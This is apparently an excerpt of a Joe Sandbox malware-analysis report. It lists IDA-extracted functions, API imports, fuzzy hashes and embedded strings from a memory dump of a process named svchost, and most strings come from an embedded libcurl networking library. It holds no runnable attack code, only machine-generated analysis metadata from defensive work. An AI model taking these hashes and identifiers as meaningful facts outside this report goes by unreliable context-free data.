                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182557
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182565
                                                                  • Part of subcall function 00000173D0182510: memset.VCRUNTIME140 ref: 00000173D018259B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182CF6
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D08
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D1F
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D31
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D48
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182D5A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup$mallocmemset
                                                                • String ID:
                                                                • API String ID: 1984507481-0
                                                                • Opcode ID: d93b4b9006e4cf8a4b154c9350ebd256b071acccc7fa893b9b6c87d79be3329d
                                                                • Instruction ID: 9bb72c8cdf0df52590556c6c74e23bd678e41632f20d91208ebf80c972334ead
                                                                • Opcode Fuzzy Hash: d93b4b9006e4cf8a4b154c9350ebd256b071acccc7fa893b9b6c87d79be3329d
                                                                • Instruction Fuzzy Hash: 1A22283A609B5092EB768FA5E5803A8B3B5F744FD4F944225CE6D07794EF38CA91E340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchrstrtol
                                                                • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                                                • API String ID: 1626215102-360479797
                                                                • Opcode ID: 571c7b5aa6929f808543d64fd2b5887140b4546232e75ae7bf2446e5d7cfa171
                                                                • Instruction ID: c2f8a24d994ac6f36170f60eb8809005d3f7258a7cd29dff859fe161e888ffad
                                                                • Opcode Fuzzy Hash: 571c7b5aa6929f808543d64fd2b5887140b4546232e75ae7bf2446e5d7cfa171
                                                                • Instruction Fuzzy Hash: 56618EB834865091EA34DB9AE8447E9E7B0B741FD0FC44021ED2E57AA5EB7CC746E304
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_errnostrchr$_strdupmemchrstrncmpstrspnstrtoul
                                                                • String ID: /:#?!@{}[]\$'"^`*<>=;,+&()%$%ld$0123456789abcdefABCDEF:.
                                                                • API String ID: 985972941-4268014273
                                                                • Opcode ID: e3d73cfefcb2f60d8f79667ca9dc62befdb60d7681af33e1471cc1775cfbf69e
                                                                • Instruction ID: d1cb9227cff8c8603de75d1a14029aefb1bdaa90738980459cfe2d90ab1946a3
                                                                • Opcode Fuzzy Hash: e3d73cfefcb2f60d8f79667ca9dc62befdb60d7681af33e1471cc1775cfbf69e
                                                                • Instruction Fuzzy Hash: B7A1743920D7C082EA759BA5D5C43E9A2B5F785FC0F940125DE6E57B92FF38CA42A300
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000000FF,?,00000000,00000000), ref: 00000173D0166D32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH: %s type %s for %s$[DoH] A: %u.%u.%u.%u$[DoH] AAAA: $[DoH] TTL: %u seconds$[DoH] hostname: %s$bad error code$unknown
                                                                • API String ID: 1294909896-228328110
                                                                • Opcode ID: cae3ecc4de0a1b268117ea0853ca74b2cb80d8142f680d7d5b8044d2e1c96a63
                                                                • Instruction ID: 8dfc86a13182e70348bbce11e025d3ecd3534f15ed5765d8104c7cb2675ac714
                                                                • Opcode Fuzzy Hash: cae3ecc4de0a1b268117ea0853ca74b2cb80d8142f680d7d5b8044d2e1c96a63
                                                                • Instruction Fuzzy Hash: 3D028B7A60868086EB748FA5E8803DEB7B0F745FD4FD4411ADAAD47B95EB38C641E700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProcmemset
                                                                • String ID: HTTP$RtlVerifyVersionInfo$ntdll
                                                                • API String ID: 2720349688-1320951699
                                                                • Opcode ID: d0e752bdb986d4987fb210704854cb6b8f50239dc797f64d43c63de54ecfa10d
                                                                • Instruction ID: 1bfe422880e3ad81287b0ecf32038e0066ce3c5933396ed638b884a82a26d460
                                                                • Opcode Fuzzy Hash: d0e752bdb986d4987fb210704854cb6b8f50239dc797f64d43c63de54ecfa10d
                                                                • Instruction Fuzzy Hash: 4851CD3A20C25086F7759BE5E8547EAF2B0B782FC4F840019D96E57B94FB79C606EB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                • Instruction ID: 7c50610438670fc2d28e7da035e2b40c3330f488724b6a177ec1002caaec1ac1
                                                                • Opcode Fuzzy Hash: c2cf571b473b600d14f1cf2488f9b52d1e09685eed8be68ba074785879acab16
                                                                • Instruction Fuzzy Hash: 8D910039309A91A2E76C9BA1D6903EDE371F789FD0F800115EB7E43B51EF2492B29305
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$strtoul$memmove
                                                                • String ID: (non-permanent)$+$:%u$Added %.*s:%d:%s to DNS cache%s$Bad syntax CURLOPT_RESOLVE removal entry '%s'$Couldn't parse CURLOPT_RESOLVE entry '%s'$RESOLVE %.*s:%d - old addresses discarded$RESOLVE *:%d using wildcard$Resolve address '%s' found illegal
                                                                • API String ID: 505971213-3374123344
                                                                • Opcode ID: 40f4310ddc72b67cab9b23e124b017a3f2be94daedede76f050124a4f57fa09e
                                                                • Instruction ID: 2f724330102d7276bffa040990d239a3760aee5715931605e104b3469aad4ad1
                                                                • Opcode Fuzzy Hash: 40f4310ddc72b67cab9b23e124b017a3f2be94daedede76f050124a4f57fa09e
                                                                • Instruction Fuzzy Hash: 51C1AE792086D486EB319B91E4103EAA7B1F786FD4FD84125EA6D07BD5FB38C645E300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: calloc
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2635317215-2522224428
                                                                • Opcode ID: 30bb503f96ebc74696a1404ab859e9a8b275aa8c8f1bb45eb47a91bb64c19206
                                                                • Instruction ID: 9730e612749b383ba770a3aff8e195c2071525f33faa93fd7ddfc853f5035f14
                                                                • Opcode Fuzzy Hash: 30bb503f96ebc74696a1404ab859e9a8b275aa8c8f1bb45eb47a91bb64c19206
                                                                • Instruction Fuzzy Hash: F2E13B7A209B4086EB758B69E8403DDA7B5F744FD8FD80115CEAD07394EB39C999DB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: +$CAPABILITY$EXAMINE$EXPUNGE$FETCH$GETQUOTAROOT$LIST$LSUB$NOOP$PREA$SEARCH$SELECT$STORE$UID$Unexpected continuation response
                                                                • API String ID: 1475443563-2064110024
                                                                • Opcode ID: e19a0e671e1203be4e80fbf40ae6663f2b95bf59ab074aa4eed95155bcf1594c
                                                                • Instruction ID: 310eba573a2620212d9fffe784f4817890ccbd35e792c8932d929866b3dd13a1
                                                                • Opcode Fuzzy Hash: e19a0e671e1203be4e80fbf40ae6663f2b95bf59ab074aa4eed95155bcf1594c
                                                                • Instruction Fuzzy Hash: 66E1AC3A60C644C5FB758A96D1043EAF3B2A381FD8FC8401AC66D476D5FB69CB46B381
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: $CONNECT responded chunked$CONNECT: fwd auth header '%s'$Connection:$Content-Length:$HTTP/1.$Ignoring Content-Length in CONNECT %03d response$Ignoring Transfer-Encoding in CONNECT %03d response$Proxy-Connection:$Proxy-authenticate:$Transfer-Encoding:$WWW-Authenticate:$chunked$close
                                                                • API String ID: 1294909896-1501247955
                                                                • Opcode ID: b5ce278b5ba784beb5d0bd0ff499b44304f26d4eff64a7c541cf6d0bb6d4c68e
                                                                • Instruction ID: f5aab1efb738ca02c75cdd31a183e88276e47b911cf6bf2a20df8db560dd3f1a
                                                                • Opcode Fuzzy Hash: b5ce278b5ba784beb5d0bd0ff499b44304f26d4eff64a7c541cf6d0bb6d4c68e
                                                                • Instruction Fuzzy Hash: F171807921829496FB34DB96E5947E9A771A342FC8FC44012D97E0BB85FB78C309A701
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ea893b04b6395d67d000b634847ae42eb734c70cfd45d7d6b81926d0d54aead7
                                                                • Instruction ID: 7e2525cb039c52db42b05a1ed5e838b5b28ef55d010004f46f8eb6566b21c120
                                                                • Opcode Fuzzy Hash: ea893b04b6395d67d000b634847ae42eb734c70cfd45d7d6b81926d0d54aead7
                                                                • Instruction Fuzzy Hash: AB41C43A209F919AE6989F65EA9439CB3B4F789BA0F444105CF7E43310EF34E1B59710
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: DIGEST-MD5 handshake failure (empty challenge message)$SSPI: could not get auth info$WDigest$schannel: InitializeSecurityContext failed: %s
                                                                • API String ID: 1294909896-508395639
                                                                • Opcode ID: 5956d99175cbb9ad2bfaf52e5a060276d7ef3c07d118a9b35e6df26b4ac68c94
                                                                • Instruction ID: 650e27f13acf5502d927ca219e43411058866d83a8f06e9b217bf3b5c7235bed
                                                                • Opcode Fuzzy Hash: 5956d99175cbb9ad2bfaf52e5a060276d7ef3c07d118a9b35e6df26b4ac68c94
                                                                • Instruction Fuzzy Hash: 2EA1497A608B9486EB249BA5E8543DEA3B4F749FC8F800015DE6E17B54FF38C646E740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr
                                                                • String ID: BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                                                • API String ID: 2830005266-1232391404
                                                                • Opcode ID: c42a3dfb4a370017086041794bb8443a61c44bf4fb67fd2a3ce2e314f3e46a1c
                                                                • Instruction ID: 9e6171a54f7f1ffd886c340b65d520508fdf00f8c01f5c291960c939cf2d56f5
                                                                • Opcode Fuzzy Hash: c42a3dfb4a370017086041794bb8443a61c44bf4fb67fd2a3ce2e314f3e46a1c
                                                                • Instruction Fuzzy Hash: 1DA1AA3A60C78181FA768FA1E4543EEA3B0F745FC4F8481259ABE57285EF39C706A740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: sendto$ErrorLast
                                                                • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                                                • API String ID: 4042023021-2715966420
                                                                • Opcode ID: 8a87e8774f9027f0560b17bcd9566997fc2b4c4cbcb327f0ac8111370436c656
                                                                • Instruction ID: 78f8088c101d14216e8bb0dd021cbb0c66c2ff8e9766e895c45cc394cd0a731d
                                                                • Opcode Fuzzy Hash: 8a87e8774f9027f0560b17bcd9566997fc2b4c4cbcb327f0ac8111370436c656
                                                                • Instruction Fuzzy Hash: 17A17B7A20869086E771CF65D4407E9B7B0F389FC8F884026EE5E8B758EB38C645D750
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_vfwprintf_l
                                                                • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                                                                • API String ID: 1355092213-3948863929
                                                                • Opcode ID: 1e5f55f230b8fbdbafccd35637d684bdb75166447e780192e33be56830b6f351
                                                                • Instruction ID: 9491e11cd5d6b5c1229649b21122b7ba4515ac14ad1ebfa2bcb896679e261dec
                                                                • Opcode Fuzzy Hash: 1e5f55f230b8fbdbafccd35637d684bdb75166447e780192e33be56830b6f351
                                                                • Instruction Fuzzy Hash: 76814A3A309B8581EA20CB95E8847DAA7F0F799BC4F800126EA9D47B55FF38C645D740
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Accept timeout occurred while waiting server connect$Checking for server connect$Ctrl conn has data while waiting for data conn$Error while waiting for server connect$FTP code: %03d$Got 226 before data activity$Ready to accept data connection from server$There is negative response in cache while serv connect
                                                                • API String ID: 0-817362717
                                                                • Opcode ID: 3cf1106be62ad4aa77d014c2d57acf1851cf7790d9541708fa7bc9c69d88be28
                                                                • Instruction ID: 503cd5362444797fc98f3391426d02d86d571c4a27c884c3b5587b67c6b9a9b7
                                                                • Opcode Fuzzy Hash: 3cf1106be62ad4aa77d014c2d57acf1851cf7790d9541708fa7bc9c69d88be28
                                                                • Instruction Fuzzy Hash: D051B67A70869045FA72DBAAE9503ED93619785BE4FC44021DE2C477D6EB38CA829700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc
                                                                • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM
                                                                • API String ID: 3095843317-2127885284
                                                                • Opcode ID: 17838d9634a2369f2acdfbf23771de2f22ce04b96826ad6d8c52dd4c0fc01954
                                                                • Instruction ID: aff659871b28452787cdf2b4b8f458cc09d4d6cb26503850b7c0c989de161206
                                                                • Opcode Fuzzy Hash: 17838d9634a2369f2acdfbf23771de2f22ce04b96826ad6d8c52dd4c0fc01954
                                                                • Instruction Fuzzy Hash: 41A18A3A309A90A7EB6C9BA5D2903E9B7B0F789BC0F840015DB7D47781EF24D6729300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$free
                                                                • String ID: HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Negotiate: noauthpersist -> %d, header part: %s$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$close$false$keep-alive
                                                                • API String ID: 3578582447-3982183773
                                                                • Opcode ID: 5400510bd5f16d79d403d8360efa22d2f07bb3401bc8769d45e40be599913d11
                                                                • Instruction ID: 4dcf815fea7e5b2eced6927b4fe828e26ff3c718d67876bd2da6c08bb336d9f1
                                                                • Opcode Fuzzy Hash: 5400510bd5f16d79d403d8360efa22d2f07bb3401bc8769d45e40be599913d11
                                                                • Instruction Fuzzy Hash: 83516A3834C640C5FA759BA6D9543E9D2B1D786FC6FC400119A2E0BAD6FB68C785E702
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 10e6199a7fed04eb3a9103f1f10943f543e8970542787782a8ffd54347bddaee
                                                                • Instruction ID: 1858d2acf49c809234d6cf24a208e8de7c2547216ba6fa4edc27cbcdf3c3eee4
                                                                • Opcode Fuzzy Hash: 10e6199a7fed04eb3a9103f1f10943f543e8970542787782a8ffd54347bddaee
                                                                • Instruction Fuzzy Hash: C5217A3A109F1182E7609F69E9D426CB3B8FB8DFA9F500205CE6E42718EF34C5A6D751
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: application/octet-stream$k
                                                                • API String ID: 2653869212-2522224428
